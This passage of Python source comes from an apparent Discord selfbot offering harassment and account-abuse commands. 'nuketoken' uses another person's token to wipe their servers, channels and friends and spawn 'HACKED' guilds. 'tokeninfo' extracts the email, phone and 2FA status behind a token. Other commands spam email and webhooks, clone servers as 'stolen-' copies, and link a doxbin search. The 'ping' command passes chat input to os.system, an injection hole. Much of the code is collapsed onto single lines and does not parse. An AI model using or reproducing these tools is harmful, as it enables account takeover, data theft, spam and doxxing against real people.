        errorprint("Exception ' {0} ', unknown error ".format(error))
        em = discord.Embed(title="Exception Error:", description="Expected Exception: unknown error \n Console Exception {0}".format(error), color=errorcolor)
        await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def checktoken(ctx, *, token = None):
    """Check whether a given account token is still valid."""
    await ctx.message.delete()
    commandprint("Command 'checktoken' has been used by " + bot.user.name)
    if token is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "checktoken token", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            headers = {'Content-Type': 'application/json', 'authorization': token}
            url = 'https://discordapp.com/api/v6/users/@me/library'
            # BUGFIX: response was previously bound to `re`, shadowing the
            # `re` module inside this function.
            resp = requests.get(url, headers=headers)
            if resp.status_code == 200:
                embed = discord.Embed(title=f"**TOKEN CHECKER**", color=color)
                embed.add_field(name="**TOKEN VALID.**", value="This token is valid, meaning you can login or use commands against the token \n", inline=False)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
            else:
                embed = discord.Embed(title=f"**TOKEN CHECKER**", color=color)
                embed.add_field(name="**TOKEN INVALID.**", value="The token has either been disabled, or the password is changed \n", inline=False)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', argument error ".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: argument error \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def gmailspam(ctx, target = None, counter: int = None, *, message = None):
    """Send `counter` copies of `message` to `target` via the configured gmail.

    SECURITY FIX: `counter` was annotated `eval`, which discord.py uses as an
    argument converter — i.e. it executed arbitrary Python supplied in chat.
    Now converted with `int`.
    NOTE(review): smtplib calls below are blocking and will stall the event
    loop for large counts.
    """
    await ctx.message.delete()
    if target is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a target \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    elif counter is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a counter \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    elif message is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "gmailspam mars@gmail.com 50 wag1", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            _smpt = smtplib.SMTP('smtp.gmail.com', 587)
            _smpt.starttls()
            try:
                _smpt.login(gmailaccount, gmailaccountpassword)
            except Exception:
                errorprint(f"Incorrect Password or gmail account, make sure you've enabled less-secure apps access"+Fore.RESET)
                embed = discord.Embed(title=f"**ERROR:**", color=color)
                embed.add_field(name="**Incorrect Password or gmail account**", value="make sure you've enabled less-secure apps access \n", inline=False)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
            else:
                count = 0
                embed = discord.Embed(title=f"**EMAIL SPAMMER**", color=color)
                embed.add_field(name="**SPAMMING**", value=target + " \n", inline=False)
                embed.add_field(name="**AMOUNT**", value=(str(counter)) + " \n", inline=False)
                embed.add_field(name="**MESSAGE**", value=message + " \n", inline=False)
                embed.set_footer(text=footer)
                await ctx.send(embed=embed, delete_after=deletetimer)
                while count < counter:
                    _smpt.sendmail(gmailaccount, target, message)
                    count += 1
                    eventprintnowebhook("Gmail Spammer | Email sent, total " + (str(count)))
                    if count == counter:
                        embed = discord.Embed(title=f"**EMAIL SPAMMER | PROCESS COMPLETE**", color=color)
                        embed.set_footer(text=footer)
                        await ctx.send(embed=embed, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', Invalid email?, Invalid Logins? ".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid email?, Invalid Logins? \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def ship(ctx, name1 = None, name2 = None):
    """Mash two names together and show a random match percentage."""
    await ctx.message.delete()
    commandprint("Command 'ship' has been used by " + bot.user.name)
    if name1 is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a name1 \n" "Example: " + prefix + "ship flairings culur", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    elif name2 is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a name2 \n" "Example: " + prefix + "ship flairings culur", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            # First half of name1 + second half of name2.
            name1letters = name1[:round(len(name1) / 2)]
            name2letters = name2[round(len(name2) / 2):]
            shippedname = "".join([name1letters, name2letters])
            randomvalue = randint(1, 100)
            embed = discord.Embed(title=f"**:heart: MATCHMAKING** :heart:", description=f":small_red_triangle_down: {name1} \n" f" :small_red_triangle: {name2} \n \n" f":twisted_rightwards_arrows: **{shippedname}** \n" f"**{randomvalue}%** Match", color=color)
            embed.set_footer(text=footer)
            await ctx.send(embed=embed, delete_after=deletetimer)
        except Exception as error:
            errorprint("Exception ' {0} ', User not found ".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)


@bot.command()
async def spamwebhook(ctx, spamwebhook = None, amount = None, *, message = None):
    """Post `message` to a webhook `amount` times (0.2s apart).

    NOTE(review): unlike the other commands this one never deletes the
    invoking message — confirm whether that is intentional.
    """
    commandprint("Command 'spamwebhook' has been used by " + bot.user.name)
    if spamwebhook is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a spamwebhook \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    elif amount is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a amount \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    elif message is None:
        embed = discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "spamwebhook link 5 hello sir", color=errorcolor)
        embed.set_footer(text=footer)
        await ctx.send(embed=embed, delete_after=deletetimer)
    else:
        try:
            embed = discord.Embed(title=f"**SPAMMING WEBHOOK**", color=color)
            embed.add_field(name="**SPAMMING**", value=spamwebhook + " \n", inline=False)
            embed.add_field(name="**AMOUNT**", value=(str(amount)) + " \n", inline=False)
            embed.add_field(name="**MESSAGE**", value=message + " \n", inline=False)
            embed.set_footer(text=footer)
            await ctx.send(embed=embed, delete_after=deletetimer)
            webhook = DiscordWebhook(url=spamwebhook, content=message)
            for _ in range(int(amount)):
                await asyncio.sleep(0.20)
                webhook.execute()
        except Exception as error:
            errorprint("Exception ' {0} ', Webhook not found ".format(error))
            em = discord.Embed(title="Exception Error:", description="Expected Exception: Webhook not found \n Console Exception {0}".format(error), color=errorcolor)
            await ctx.send(embed=em, delete_after=deletetimer)

# fun fact
# listening to Baby by justin bieber rn. slaps.
@bot.command() async def namemc(ctx, username = None): await ctx.message.delete() commandprint("Command 'namemc' has been used by " + bot.user.name + " with a username of '" + username + "'") if username is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a username \n" "Example: " + prefix + "namemc culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: names = [] names.clear() req = requests.get(f'https://playerdb.co/api/player/minecraft/{username}') if 'code":"player.found"' in req.text: embed=discord.Embed(title=f"**{username} | MC INFORMATION**", color=color) embed.add_field(name="**Full UUID:**", value=f"{req.json()['data']['player']['id']}", inline=False) embed.add_field(name="**Trimmed UUID:**", value=f"{req.json()['data']['player']['raw_id']}", inline=False) for name in req.json()['data']['player']['meta']['name_history']: names.append(name['name']) embed.add_field(name="**Passed Usernames**", value=f"({len(names)}): {names}", inline=False) embed.set_footer(text=footer) embed.set_thumbnail(url="https://crafatar.com/avatars/" + f"{req.json()['data']['player']['id']}") await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Username not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Username not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def translateto(ctx, language = None, *, text = None): await ctx.message.delete() commandprint("Command 'translateto' has been used by " + bot.user.name) if language is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a language \n" "Example: " + prefix + "translateto fr hello sir yes yes", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, 
delete_after=deletetimer) elif text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "translateto fr hello sir yes yes", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title=f"**TRANSLATED**", description="Your translated text is '" + ts.google(text, to_language=language, from_language='auto') + "'", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown language ".format(error)) em = discord.Embed(title="Exception Error:", description=f"Expected Exception: Sentances must be QUOTED example " + prefix + "lang 'hello' de \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def translatefrom(ctx, *, text = None): await ctx.message.delete() commandprint("Command 'translatefrom' has been used by " + bot.user.name) if text is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified any text \n" "Example: " + prefix + "translatefrom hola si si", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title=f"**TRANSLATED**", description="Your translated text is '" + ts.google(text) + "'", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Unknown language ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Unknown language \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def resolve(ctx, hostname = None): await ctx.message.delete() commandprint("Command 'resolve' has been used by " + 
bot.user.name) if hostname is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a hostname \n" "Example: " + prefix + "resolve google.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: ip = socket.gethostbyname(hostname) embed=discord.Embed(title=f"**RESOLVED**", color=color) embed.add_field(name="**" + hostname + "**", value=ip + " \n", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Domain not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Domain not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ports(ctx): await ctx.message.delete() commandprint("Command 'ports' has been used by " + bot.user.name) try: embed=discord.Embed(title=f"**PORTS**", color=color) embed.add_field(name="**SFTP**", value="21 \n", inline=True) embed.add_field(name="**SSH**", value="22 \n", inline=True) embed.add_field(name="**TELNET**", value="23 \n", inline=True) embed.add_field(name="**SMTP**", value="25 \n", inline=True) embed.add_field(name="**DNS**", value="53 \n", inline=True) embed.add_field(name="**HTTP**", value="80 \n", inline=True) embed.add_field(name="**HTTPS**", value="443 \n", inline=True) embed.add_field(name="**OVH**", value="992 \n", inline=True) embed.add_field(name="**NFO**", value="1192 \n", inline=True) embed.add_field(name="**XBOX**", value="3074 \n", inline=True) embed.add_field(name="**VPN**", value="7777 \n", inline=True) embed.add_field(name="**PS4**", value="9707 \n", inline=True) embed.add_field(name="**HOTSPOT**", value="9286 \n", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found 
".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def guildcopy(ctx): await ctx.message.delete() commandprint("Command 'guildcopy' has been used by " + bot.user.name) await bot.create_guild(f'stolen-{ctx.guild.name}') await asyncio.sleep(3) for g in bot.guilds: if f'stolen-{ctx.guild.name}' in g.name: for c in g.channels: await c.delete() for r in ctx.guild.roles: await g.create_role(name=r.name, permissions=r.permissions, colour=r.colour, hoist=r.hoist, mentionable=r.mentionable) for cate in ctx.guild.categories: x = await g.create_category(f"{cate.name}") for chann in cate.channels: if isinstance(chann, discord.VoiceChannel): await x.create_voice_channel(f"{chann}") if isinstance(chann, discord.TextChannel): await x.create_text_channel(f"{chann}") for r in ctx.guild.roles: for role in g.roles: if r.position == 0: return if r.position < 1: return await role.edit(position=r.position) @bot.command() async def mcserver(ctx, domain = None): await ctx.message.delete() if domain is None: commandprint("Command 'mcserver' has been used by " + bot.user.name + " with no domain") embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a domain \n" "Example: " + prefix + "mcserver veltpvp.com", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: p = requests.get(f'https://api.mcsrvstat.us/2/{domain}') if 'online":true' in p.text: commandprint("Command 'mcserver' has been used by " + bot.user.name + " with a domain of '" + domain + "'") try: embed=discord.Embed(title=f"**MC SERVER INFORMATION | {domain}**", color=color) embed.add_field(name="IP", value=f"{p.json()['ip']}", inline=False) embed.add_field(name="Port:", value=f"{p.json()['port']}", inline=False) embed.add_field(name="Version:", 
value=f"{p.json()['version']}", inline=False) embed.add_field(name="Players:", value=f"{p.json()['players']['online']}/{p.json()['players']['max']}", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) else: embed = discord.Embed(title=f"**{domain} IS OFFLINE**", description="Make sure you have the DOMAIN correct.", color=errorcolor) embed.set_footer(text=footer + " | this command was made by Rith#2491") await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def embed(ctx, message = None): await ctx.message.delete() commandprint("Command 'embed' has been used by " + bot.user.name) if message is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a message \n" "Example: " + prefix + "embed bruh", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed = discord.Embed(title=message, color=color) await ctx.send("", embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def userinfo(ctx, member: discord.User=None): await ctx.message.delete() commandprint("Command 'userinfo' has been used by " + bot.user.name) if member is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a user \n" "Example: " + prefix + "userinfo @Flairings", color=errorcolor) embed.set_footer(text=footer) await 
ctx.send(embed=embed, delete_after=deletetimer) else: try: if not member: # if member is no mentioned member = ctx.message.author # set member as the author roles = [role for role in member.roles] embed = discord.Embed(title=f"**USER INFO FOR {member}**", color=color) embed.set_thumbnail(url=member.avatar_url) embed.set_footer(text=f"Requested by {ctx.author}") embed.add_field(name="ID:", value=member.id) embed.add_field(name="Display Name:", value=member.display_name) embed.add_field(name="Created Account On:", value=member.created_at.strftime("%a, %#d %B %Y, %I:%M %p UTC")) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: # doesnt work properly errorprint("Exception ' {0} ', User not found ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: User not found \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def ping(ctx, ip = None): await ctx.message.delete() commandprint("Command 'ping' has been used by " + bot.user.name) if ip is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a ip \n" "Example: " + prefix + "ping 1.1.1.1", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: response = os.system("ping -c 1 " + ip) if response == 0: embed = discord.Embed(title="**PINGING**", description=f"{ip} is online", color=color) else: embed = discord.Embed(title="**PINGING**", description=f"{ip} is offline", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid IP ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid IP \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) # TOKEN 
NUKING guildsIds = [] friendsIds = [] channelIds = [] class Login(discord.Client): async def on_connect(self): for g in self.guilds: guildsIds.append(g.id) for f in self.user.friends: friendsIds.append(f.id) for c in self.private_channels: channelIds.append(c.id) await self.logout() def run(self, token): try: super().run(token, bot=False) except Exception as e: tokenprint("exception:" + str(e)) def tokenFuck(targettoken): headers = {'Authorization': targettoken} tokenprint("Attempting to Nuke " + targettoken) try: for guild in guildsIds: requests.delete(f'https://discord.com/api/v8/users/@me/guilds/{guild}', headers=headers) tokenprint(" Deleting guilds...") except Exception as e: tokenprint(f"Unable to delete guilds... {e}") try: for id in channelIds: requests.delete(f'https://discord.com/api/v8/channels/{id}', headers=headers) except Exception as e: tokenprint(f"Unable to delete channels... {e}") try: for friend in friendsIds: requests.delete(f'https://discord.com/api/v6/users/@me/relationships/{friend}', headers=headers) tokenprint(" Removing friends...") except Exception as e: tokenprint(f"Unable to remove friends... 
{e}") try: for i in range(50): payload = {'name': f'HACKED {i}', 'region': 'europe', 'icon': None, 'channels': None} requests.post('https://discord.com/api/v6/guilds', headers=headers, json=payload) except: tokenprint("Unable to create guilds...") @bot.command() async def nuketoken(ctx, targettoken = None): await ctx.message.delete() threads = 90 commandprint("Command 'nuketoken' has been used by " + bot.user.name) if targettoken is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "nuketoken token", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: embed=discord.Embed(title="**NUKING TOKEN**", description="Check console or webhooks for progress", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) Login().run(targettoken) if threading.active_count() < int(threads): t = threading.Thread(target=tokenFuck, args=(targettoken,)) t.start() except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def tokeninfo(ctx, tokeninfotoken = None): await ctx.message.delete() commandprint("Command 'tokeninfo' has been used by " + bot.user.name) if tokeninfotoken is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a token \n" "Example: " + prefix + "tokeninfo token", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: headers = {'Authorization': tokeninfotoken, 'Content-Type': 'application/json'} r = requests.get('https://discord.com/api/v6/users/@me', headers=headers) if r.status_code == 200: userName = r.json()['username'] + '#' + 
r.json()['discriminator'] userID = r.json()['id'] phone = r.json()['phone'] email = r.json()['email'] mfa = r.json()['mfa_enabled'] embed = discord.Embed(title="**TOKEN INFORMATION**", color=color) embed.add_field(name=f"**USER ID**", value=f"{userID}", inline=False) embed.add_field(name=f"**USER NAME**", value=f"{userName}", inline=False) embed.add_field(name=f"**2 FACTOR**", value=f"{mfa}", inline=False) embed.add_field(name=f"**EMAIL**", value=f"{email}", inline=False) embed.add_field(name=f"**PHONE NUMBER**", value=f"{phone if phone else 'N/A'}", inline=False) embed.add_field(name=f"**TOKEN**", value=f"{tokeninfotoken}", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def yourtoken(ctx): await ctx.message.delete() commandprint("Command 'yourtoken' has been used by " + bot.user.name) try: embed = discord.Embed(title="**YOUR TOKEN**", description=token, color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Invalid token ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Invalid token \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command(aliases=["phub"]) async def pornhub(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'pornhub' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "pornhub monkey", color=errorcolor) embed.set_footer(text=footer) 
await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**PORNHUB**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f1/Pornhub-logo.svg/512px-Pornhub-logo.svg.png") embed.add_field(name="URL: ", value=f"https://www.pornhub.com/video/search?search={search}", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=["db"]) async def doxbin(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'doxbin' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "doxbin culur", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**DOXBIN**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/2/27/Brian_krebs.png") embed.add_field(name="URL: ", value=f"https://doxbin.org/search/{search}", inline=True) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=["yt"]) async def youtube(ctx, *, search = None): await ctx.message.delete() commandprint("Command 'youtube' has been used by " + bot.user.name) if search is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a search inquiry \n" "Example: " + prefix + "youtube man vapes cum", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: embed=discord.Embed(title="**YOUTUBE**", color=color) embed.set_thumbnail(url="https://upload.wikimedia.org/wikipedia/commons/thumb/9/94/YouTube_social_white_circle_%28pink%29.svg/120px-YouTube_social_white_circle_%28pink%29.svg.png") embed.add_field(name="URL: ", value=f"https://www.youtube.com/results?search_query={search}", inline=True) 
embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command(aliases=['corona']) async def covid(ctx): await ctx.message.delete() commandprint("Command 'covid' has been used by " + bot.user.name) r = requests.get("https://api.covid19api.com/world/total") res = r.json() totalc = 'TotalConfirmed' totald = 'TotalDeaths' totalr = 'TotalRecovered' embed = discord.Embed(title='Updated Just Now:', description=f"Deaths | **{res[totald]}**\nConfirmed | **{res[totalc]}**\nRecovered | **{res[totalr]}**") # create embed embed.colour = color embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) @bot.command() async def emojisteal(ctx): await ctx.message.delete() commandprint("Command 'emojisteal' has been used by " + bot.user.name) try: emoji = discord.Emoji folderName = 'Emojis\\' + ctx.guild.name.translate({ord(c): None for c in '/<>:"\\|?*'}) if not os.path.exists(folderName): os.makedirs(folderName) for emoji in ctx.guild.emojis: emoji_image = await emoji.url.read() if emoji.animated: fileName = folderName + '/' + emoji.name + ".gif" else: fileName = folderName + '/' + emoji.name + ".png" with open(fileName, 'wb') as outFile: req = urllib.request.Request(emoji.url, headers={'User-Agent': 'Mozilla/5.0'}) data = urllib.request.urlopen(req).read() outFile.write(data) eventprint("User has downloaded a servers emojis ") em = discord.Embed(title="Successfully downloaded all emojis", description="Please contact a host to receive your data", color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', command can only be used within servers".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Couldn't gather emojis \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def hypesquad(ctx, house = None): global 
payload await ctx.message.delete() commandprint("Command 'hypesquad' has been used by " + bot.user.name) if house is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a house \n" "Example: " + prefix + "hypesquad brilliance", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: request = requests.session() headers = { 'Authorization': token, 'Content-type': 'application/json' } if house == "bravery": payload = {'house_id': 1} elif house == "brilliance": payload = {'house_id': 2} elif house == "balance": payload = {'house_id': 3} try: request.post('https://discordapp.com/api/v6/hypesquad/online', headers=headers, json=payload) # untested, may not work because of global statement eventprint("HypeSquad has been changed to " + house) em = discord.Embed(title="**HYPESQUAD CHANGED**", description="Your hypesquad has been changed to " + house, color=color) em.set_footer(text=footer) await ctx.send(embed=em, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Failed to contact discord api".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Failed to contact discord api \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def exportfriends(ctx): await ctx.message.delete() commandprint("Command 'exportfriends' has been used by " + bot.user.name) try: for user in bot.user.friends: print(user.name+"#"+user.discriminator) eventprint("Friends exported") embed = discord.Embed(title="", color=color) embed.add_field(name="**FRIENDS LIST EXPORTED**", value="Results printed to console, please contact a host to receive your data.", inline=False) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not fetch friends ".format(error)) em = 
discord.Embed(title="Exception Error:", description="Expected Exception: Could not fetch friends \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def restart(ctx): await ctx.message.delete() commandprint("Command 'restart' has been used by " + bot.user.name) try: eventprint(f"Restarting {name}... ") embed = discord.Embed(title=f"**Restarting {name}...**", description="This will take up to 10 seconds, if your bot does not restart notify an admin.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) restartbot() except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setprefix(ctx, newprefix = None): await ctx.message.delete() commandprint("Command 'setprefix' has been used by " + bot.user.name) if newprefix is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a prefix \n" "Example: " + prefix + "setprefix /", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("prefix")] = newprefix with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Prefix has been set to " + newprefix) embed = discord.Embed(title="PREFIX CHANGED", description=f"Prefix is now '{newprefix}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def setemoji(ctx, *, newemoji = None): await ctx.message.delete() commandprint("Command 'setemoji' has been used by " + bot.user.name) if newemoji is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a emoji \n" "Example: " + prefix + "setemoji <3", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("emoji")] = newemoji with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Emoji has been set to " + newemoji) embed = discord.Embed(title="EMOJI CHANGED", description=f"Emoji is now '{newemoji}'. 
\n Restart the bot in order for changes to take place.", color=color) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) except Exception as error: errorprint("Exception ' {0} ', Could not edit config ".format(error)) em = discord.Embed(title="Exception Error:", description="Expected Exception: Could not edit config \n Console Exception {0}".format(error), color=errorcolor) await ctx.send(embed=em, delete_after=deletetimer) @bot.command() async def settitle(ctx, *, newtitle = None): await ctx.message.delete() commandprint("Command 'settitle' has been used by " + bot.user.name) if newtitle is None: embed=discord.Embed(title=f"**Invalid syntax**", description="You have not specified a title \n" "Example: " + prefix + "settitle flairings is good dev", color=errorcolor) embed.set_footer(text=footer) await ctx.send(embed=embed, delete_after=deletetimer) else: try: with open(f"data/configurations/{config_name}.json", "r") as f: config = json.load(f) config[str("title")] = newtitle with open(f"data/configurations/{config_name}.json", "w") as f: json.dump(config, f, indent=4) eventprint("Title has been set to " + newtitle) embed = discord.Embed(title="TITLE CHANGED", description=f"Title is now '{newtitle}'. 
